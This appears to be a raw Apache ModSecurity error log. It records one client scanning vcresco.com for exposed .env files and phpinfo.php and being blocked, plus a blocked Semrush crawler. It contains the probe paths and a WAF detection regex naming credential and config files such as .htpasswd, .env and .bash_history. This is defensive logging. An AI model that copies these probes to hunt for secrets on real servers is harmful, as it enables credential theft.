[Tue May 26 13:04:00.459672 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-jwAAEBo"]
[Tue May 26 13:04:00.460262 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-kQAAEAg"]
[Tue May 26 13:04:00.465352 2026] [security2:error] [pid 470766:tid 470782] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/administrator/.env"] [unique_id "ahVM6OjO_W1DqEcFHQ7-dwAAEA8"]
[Tue May 26 13:04:00.496065 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-owAAAGY"]
[Tue May 26 13:04:00.496629 2026] [security2:error] [pid 470766:tid 470965] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-nwAAAEU"]
[Tue May 26 13:04:00.497038 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-oAAAECk"]
[Tue May 26 13:04:00.497415 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-mgAAEAo"]
[Tue May 26 13:04:00.497562 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-oQAAED4"]
[Tue May 26 13:04:00.509009 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-qAAAEEY"]
[Tue May 26 13:04:00.512218 2026] [security2:error] [pid 470766:tid 471004] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-pwAAAGw"]
[Tue May 26 13:04:00.524286 2026] [security2:error] [pid 470766:tid 470846] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/api/phpinfo.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-qgAAEE8"]
[Tue May 26 13:04:00.539953 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-qQAAED8"]
[Tue May 26 13:04:00.587914 2026] [security2:error] [pid 470766:tid 470904] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-rgAACCo"]
[Tue May 26 13:04:00.611713 2026] [security2:error] [pid 470766:tid 470959] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-sQAAAD8"]
[Tue May 26 13:04:00.643540 2026] [security2:error] [pid 470766:tid 470812] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/apis/.env"] [unique_id "ahVM6OjO_W1DqEcFHQ7-xgAACC0"]
[Tue May 26 13:04:00.644548 2026] [security2:error] [pid 470766:tid 470982] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-vgAAAFY"]
[Tue May 26 13:04:00.647665 2026] [security2:error] [pid 470766:tid 470975] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-uwAAAE8"]
[Tue May 26 13:04:00.652900 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-vAAAAGk"]
[Tue May 26 13:04:00.653955 2026] [security2:error] [pid 470766:tid 470949] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-vwAAADU"]
[Tue May 26 13:04:00.678686 2026] [security2:error] [pid 470766:tid 470904] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-xwAACDQ"]
[Tue May 26 13:04:00.680896 2026] [security2:error] [pid 470766:tid 470963] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-wAAAAEM"]
[Tue May 26 13:04:00.688670 2026] [security2:error] [pid 470766:tid 471015] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-zQAAAHc"]
[Tue May 26 13:04:00.689178 2026] [security2:error] [pid 470766:tid 470904] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-zgAACEI"]
[Tue May 26 13:04:00.689257 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-zAAAAGg"]
[Tue May 26 13:04:00.698833 2026] [security2:error] [pid 470766:tid 470955] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-zwAAADs"]
[Tue May 26 13:04:00.704068 2026] [security2:error] [pid 470766:tid 470910] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-0wAAAA4"]
[Tue May 26 13:04:00.729458 2026] [security2:error] [pid 470766:tid 471005] [client 85.208.96.210:23762] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahVM6OjO_W1DqEcFHQ7-2QAAAG0"]
[Tue May 26 13:04:00.729596 2026] [security2:error] [pid 470766:tid 471005] [client 85.208.96.210:23762] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahVM6OjO_W1DqEcFHQ7-2QAAAG0"]
[Tue May 26 13:04:00.733521 2026] [security2:error] [pid 470766:tid 470816] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/app/.env"] [unique_id "ahVM6OjO_W1DqEcFHQ7-2gAACDE"]
[Tue May 26 13:04:00.771529 2026] [security2:error] [pid 470766:tid 471010] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-iAAAAHI"]
[Tue May 26 13:04:00.773808 2026] [security2:error] [pid 470766:tid 470933] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-3AAAACU"]
[Tue May 26 13:04:00.783010 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-3QAAAH8"]
[Tue May 26 13:04:00.803750 2026] [security2:error] [pid 470766:tid 471020] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-5AAAAHw"]
[Tue May 26 13:04:00.839664 2026] [security2:error] [pid 470766:tid 470987] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-8gAAAFs"]
[Tue May 26 13:04:00.840035 2026] [security2:error] [pid 470766:tid 470994] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-7gAAAGI"]
[Tue May 26 13:04:00.841133 2026] [security2:error] [pid 470766:tid 470999] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-9QAAAGc"]
[Tue May 26 13:04:00.848698 2026] [security2:error] [pid 470766:tid 470903] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-8wAAAAc"]
[Tue May 26 13:04:00.853824 2026] [security2:error] [pid 470766:tid 470906] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-9AAAAAo"]
[Tue May 26 13:04:00.866495 2026] [security2:error] [pid 470766:tid 470909] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7--wAAAA0"]
[Tue May 26 13:04:00.874844 2026] [security2:error] [pid 470766:tid 470970] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7-_gAAAEo"]
[Tue May 26 13:04:00.925059 2026] [security2:error] [pid 470766:tid 470915] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_BgAAE0c"]
[Tue May 26 13:04:00.928306 2026] [security2:error] [pid 470766:tid 470915] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_BQAAE3U"]
[Tue May 26 13:04:00.929757 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_CwAAADY"]
[Tue May 26 13:04:00.932151 2026] [security2:error] [pid 470766:tid 470982] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_CgAAAFY"]
[Tue May 26 13:04:00.933016 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_CQAAABs"]
[Tue May 26 13:04:00.934891 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_DAAAAEE"]
[Tue May 26 13:04:00.956891 2026] [security2:error] [pid 470766:tid 470915] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_DQAAEzg"]
[Tue May 26 13:04:00.974963 2026] [security2:error] [pid 470766:tid 470936] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_EAAAACg"]
[Tue May 26 13:04:00.988477 2026] [security2:error] [pid 470766:tid 470815] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/application/.env"] [unique_id "ahVM6OjO_W1DqEcFHQ7_FgAAEzA"]
[Tue May 26 13:04:00.990933 2026] [security2:error] [pid 470766:tid 471012] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_EwAAAHQ"]
[Tue May 26 13:04:00.994522 2026] [security2:error] [pid 470766:tid 470835] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/apps/.env"] [unique_id "ahVM6OjO_W1DqEcFHQ7_GAAAE0Q"]
[Tue May 26 13:04:01.012517 2026] [security2:error] [pid 470766:tid 470915] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_FQAAEyQ"]
[Tue May 26 13:04:01.031787 2026] [security2:error] [pid 470766:tid 470915] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6OjO_W1DqEcFHQ7_GQAAEyw"]
[Tue May 26 13:04:01.045269 2026] [security2:error] [pid 470766:tid 470915] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_HAAAE3Q"]
[Tue May 26 13:04:01.049302 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_HgAAAGM"]
[Tue May 26 13:04:01.049839 2026] [security2:error] [pid 470766:tid 470915] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_HwAAE0o"]
[Tue May 26 13:04:01.273544 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_IAAAQFg"]
[Tue May 26 13:04:01.275810 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_IwAAQG8"]
[Tue May 26 13:04:01.280462 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_IgAAQHI"]
[Tue May 26 13:04:01.280869 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_IQAAQHM"]
[Tue May 26 13:04:01.305641 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_LgAAABQ"]
[Tue May 26 13:04:01.311634 2026] [security2:error] [pid 470766:tid 470938] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_LAAAACo"]
[Tue May 26 13:04:01.312583 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_OgAAAH8"]
[Tue May 26 13:04:01.318155 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_NgAAQFk"]
[Tue May 26 13:04:01.318189 2026] [security2:error] [pid 470766:tid 470972] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_RwAAAEw"]
[Tue May 26 13:04:01.318544 2026] [security2:error] [pid 470766:tid 471017] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_QgAAAHk"]
[Tue May 26 13:04:01.318691 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM6ejO_W1DqEcFHQ7_MwAAAGA"]
